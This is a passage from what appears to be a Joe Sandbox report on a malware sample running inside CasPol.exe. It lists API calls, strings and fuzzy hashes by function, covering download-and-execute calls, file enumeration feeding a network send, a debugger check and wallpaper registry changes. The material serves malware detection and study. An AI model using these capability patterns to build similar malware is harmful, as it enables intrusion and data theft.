                                                                                                              • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                                                              • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 00407A91
                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                              • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Find$File$CloseFirstH_prologNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 1157919129-0
                                                                                                              • Opcode ID: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                                                                              • Instruction ID: c296e4c637b16ec180f1d25cf2666c4e6f2336455dd814d501b84ef2841b6e91
                                                                                                              • Opcode Fuzzy Hash: be329e02f9a977489ec03ab4a587285a9e8b683dbacd723bef2334c22b0cd63e
                                                                                                              • Instruction Fuzzy Hash: 485173329041085ACB14FB65DD969DD7778AF50318F50417EB806B31E2EF38AB498B99
                                                                                                              APIs
                                                                                                              • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                                                                              • _free.LIBCMT ref: 00448067
                                                                                                                • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000), ref: 00446ADB
                                                                                                                • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                              • _free.LIBCMT ref: 00448233
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                              • String ID:
                                                                                                              • API String ID: 1286116820-0
                                                                                                              • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                              • Instruction ID: adcac59616ce0bf4d9b6f5e4feac4fc1c4b096f081e8a0f87c9a15d47e4c4f65
                                                                                                              • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                                                                                                              • Instruction Fuzzy Hash: 13510B719002099BE714DF69DC819AFB7BCEF41354F10456FE454A32A1EF389E46CB58
                                                                                                              APIs
                                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                              • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: DownloadExecuteFileShell
                                                                                                              • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                                                              • API String ID: 2825088817-4197237851
                                                                                                              • Opcode ID: 6e9ed81df7592736f00ea2213c3013647c852b2a2a077cd37a63e9025159bc8b
                                                                                                              • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                                              • Opcode Fuzzy Hash: 6e9ed81df7592736f00ea2213c3013647c852b2a2a077cd37a63e9025159bc8b
                                                                                                              • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                                              APIs
                                                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                              • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$FirstNextsend
                                                                                                              • String ID: x@G$x@G
                                                                                                              • API String ID: 4113138495-3390264752
                                                                                                              • Opcode ID: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                                                                              • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                                              • Opcode Fuzzy Hash: be8fdfc8a6072efbca1459ab7643d284853c2ddcf9d8b62b0637e10f69e8db4b
                                                                                                              • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                              APIs
                                                                                                              • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                                • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,004655B0), ref: 004126E1
                                                                                                                • Part of subcall function 004126D2: RegSetValueExA.ADVAPI32(004655B0,?,00000000,?,00000000,00000000), ref: 00412709
                                                                                                                • Part of subcall function 004126D2: RegCloseKey.ADVAPI32(004655B0), ref: 00412714
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CloseCreateInfoParametersSystemValue
                                                                                                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                              • API String ID: 4127273184-3576401099
                                                                                                              • Opcode ID: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                                                                              • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                                              • Opcode Fuzzy Hash: b2749757bbb715b84591827a24ab2664cb1dcc6a43466099e0f50718dd789739
                                                                                                              • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                                              APIs
                                                                                                              • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                              • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: FileFind$FirstH_prologNext
                                                                                                              • String ID:
                                                                                                              • API String ID: 301083792-0
                                                                                                              • Opcode ID: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                                                                              • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                                              • Opcode Fuzzy Hash: 0245cb435e7972fa9dc1819fe4f867f76e5734f3076513a46e64ed25397209d2
                                                                                                              • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                              • String ID:
                                                                                                              • API String ID: 2829624132-0
                                                                                                              • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                              • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                                                              • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                              • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                                                              APIs
                                                                                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 0043A755
                                                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 0043A75F
                                                                                                              • UnhandledExceptionFilter.KERNEL32(?), ref: 0043A76C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                              • String ID:
                                                                                                              • API String ID: 3906539128-0
                                                                                                              • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                              • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                                              • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                              • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                                              APIs
                                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326C2,00000024,?,?,?), ref: 0043294C
                                                                                                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBBE,?), ref: 00432962
                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBBE,?), ref: 00432974
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                              • String ID:
                                                                                                              • API String ID: 1815803762-0
                                                                                                              • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                              • Instruction ID: 80435fde6f6b62f03973a002229794bf261f16e8857de4c024377aa862d1bdf3
                                                                                                              • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                                                                                                              • Instruction Fuzzy Hash: 11E06D31308211BBEB310E25BC08F573F94AF89B71F71053AB211E40E4C2A188419A1C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .
                                                                                                              • API String ID: 0-248832578
                                                                                                              • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                              • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                                                                              • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                              • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                              • String ID: <D
                                                                                                              • API String ID: 1084509184-3866323178
                                                                                                              • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                              • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                                                              • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                              • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                              • String ID: <D
                                                                                                              • API String ID: 1084509184-3866323178
                                                                                                              • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                              • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                                              • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                              • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                                              APIs
                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: InfoLocale
                                                                                                              • String ID: GetLocaleInfoEx
                                                                                                              • API String ID: 2299586839-2904428671
                                                                                                              • Opcode ID: e6c87920e06762166a5833a65f3cc1d4ab5ad226655bcee6b6e0faca9150eed0
                                                                                                              • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                                              • Opcode Fuzzy Hash: e6c87920e06762166a5833a65f3cc1d4ab5ad226655bcee6b6e0faca9150eed0
                                                                                                              • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$CodeInfoLocalePageValid_abort_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 1661935332-0
                                                                                                              • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                              • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                                              • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                              • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                              • String ID:
                                                                                                              • API String ID: 1663032902-0
                                                                                                              • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                              • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                                              • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                              • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                                              APIs
                                                                                                                • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2692324296-0
                                                                                                              • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                              • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                                              • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                              • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                                              APIs
                                                                                                              • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7D7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: NameUser
                                                                                                              • String ID:
                                                                                                              • API String ID: 2645101109-0
                                                                                                              • Opcode ID: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                                                                              • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                                                                                                              • Opcode Fuzzy Hash: b83c9b6e74ee29b4b3c5d203829dc1b50a3012795622bded812fc81b4dbbb1d6
                                                                                                              • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                                                                                                              APIs
                                                                                                                • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(?,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                                              • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
                                                                                                              Yara matches
                                                                                                              Similarity
                                                                                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 1272433827-0
                                                                                                              • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
• Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
• Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
• Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID:
• API String ID: 1084509184-0
• Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
• Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
• Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
• Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
APIs
• GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
• Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
• Opcode Fuzzy Hash: 5e9075a3806edf431e091a568af27ae769e925cdac090a6302122e919684f26a
• Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
APIs
Memory Dump Source
• Source File: 00000022.00000002.585780717.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_34_2_400000_CasPol.jbxd
Yara matches
Similarity
• API ID: HeapProcess
• String ID:
• API String ID: 54951025-0
• Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
• Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
